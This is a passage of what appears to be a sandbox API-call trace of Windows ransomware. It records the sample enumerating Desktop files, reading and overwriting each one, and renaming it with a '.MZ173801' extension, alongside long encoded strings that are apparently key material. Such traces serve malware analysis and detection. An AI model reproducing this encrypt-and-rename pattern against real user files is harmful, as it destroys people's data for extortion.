5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.942] GetCurrentThreadId () returned 0x1358 [0122.942] GetCurrentThreadId () returned 0x1358 [0122.942] GetCurrentThreadId () returned 0x1358 [0122.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.943] GetCurrentThreadId () returned 0x1358 [0122.943] GetCurrentThreadId () returned 0x1358 [0122.943] GetCurrentThreadId () returned 0x1358 [0122.943] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\93FAioEJ-r.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\93faioej-r.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.943] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0122.943] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.943] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xf0b1 [0122.943] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.943] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xf0b1, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xf0b1, lpOverlapped=0x0) returned 1 [0122.944] CloseHandle (hObject=0x410) returned 1 [0122.945] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\93FAioEJ-r.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\93faioej-r.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.946] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xf0b1, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0xf0b1, lpOverlapped=0x0) returned 1 [0122.948] CloseHandle (hObject=0x410) returned 1 [0122.948] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\93FAioEJ-r.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\93faioej-r.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\93FAioEJ-r.bmp.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\93faioej-r.bmp.mz173801")) returned 1 [0122.949] GetCurrentThreadId () returned 0x1358 [0122.949] GetCurrentThreadId () returned 0x1358 [0122.949] GetCurrentThreadId () returned 0x1358 [0122.949] GetCurrentThreadId () returned 0x1358 [0122.949] GetCurrentThreadId () returned 0x1358 [0122.949] GetCurrentThreadId () returned 0x1358 [0122.949] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e71dd30, ftCreationTime.dwHighDateTime=0x1d5eb24, ftLastAccessTime.dwLowDateTime=0x4d8c4d50, ftLastAccessTime.dwHighDateTime=0x1d5ee81, ftLastWriteTime.dwLowDateTime=0x4d8c4d50, ftLastWriteTime.dwHighDateTime=0x1d5ee81, nFileSizeHigh=0x0, nFileSizeLow=0x17386, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="a8W18 Y4u-HyG.jpg", cAlternateFileName="A8W18Y~1.JPG")) returned 1 [0122.949] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.949] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.949] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\a8W18 Y4u-HyG.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\a8w18 y4u-hyg.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e71dd30, ftCreationTime.dwHighDateTime=0x1d5eb24, ftLastAccessTime.dwLowDateTime=0x4d8c4d50, ftLastAccessTime.dwHighDateTime=0x1d5ee81, ftLastWriteTime.dwLowDateTime=0x4d8c4d50, ftLastWriteTime.dwHighDateTime=0x1d5ee81, nFileSizeHigh=0x0, nFileSizeLow=0x17386)) returned 1 [0122.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.950] GetCurrentThreadId () returned 0x1358 [0122.950] GetCurrentThreadId () returned 0x1358 [0122.950] GetCurrentThreadId () returned 0x1358 [0122.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.951] GetCurrentThreadId () returned 0x1358 [0122.951] GetCurrentThreadId () returned 0x1358 [0122.951] GetCurrentThreadId () returned 0x1358 [0122.951] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\a8W18 Y4u-HyG.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\a8w18 y4u-hyg.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.951] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0122.951] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.951] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x17386 [0122.951] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.951] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x17386, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x17386, lpOverlapped=0x0) returned 1 [0122.953] CloseHandle (hObject=0x410) returned 1 [0122.954] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\a8W18 Y4u-HyG.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\a8w18 y4u-hyg.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.956] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x17386, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x17386, lpOverlapped=0x0) returned 1 [0122.961] CloseHandle (hObject=0x410) returned 1 [0122.961] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\a8W18 Y4u-HyG.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\a8w18 y4u-hyg.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\a8W18 Y4u-HyG.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\a8w18 y4u-hyg.jpg.mz173801")) returned 1 [0122.961] GetCurrentThreadId () returned 0x1358 [0122.961] GetCurrentThreadId () returned 0x1358 [0122.961] GetCurrentThreadId () returned 0x1358 [0122.961] GetCurrentThreadId () returned 0x1358 [0122.961] GetCurrentThreadId () returned 0x1358 [0122.961] GetCurrentThreadId () returned 0x1358 [0122.961] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b78c270, ftCreationTime.dwHighDateTime=0x1d5e28e, ftLastAccessTime.dwLowDateTime=0x6fcbf130, ftLastAccessTime.dwHighDateTime=0x1d5e789, ftLastWriteTime.dwLowDateTime=0x6fcbf130, ftLastWriteTime.dwHighDateTime=0x1d5e789, nFileSizeHigh=0x0, nFileSizeLow=0x1763a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="BQ0-O.pptx", cAlternateFileName="BQ0-O~1.PPT")) returned 1 [0122.962] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.962] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.962] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\BQ0-O.pptx" (normalized: "c:\\users\\fd1hvy\\desktop\\bq0-o.pptx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b78c270, ftCreationTime.dwHighDateTime=0x1d5e28e, ftLastAccessTime.dwLowDateTime=0x6fcbf130, ftLastAccessTime.dwHighDateTime=0x1d5e789, ftLastWriteTime.dwLowDateTime=0x6fcbf130, ftLastWriteTime.dwHighDateTime=0x1d5e789, nFileSizeHigh=0x0, nFileSizeLow=0x1763a)) returned 1 [0122.962] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUw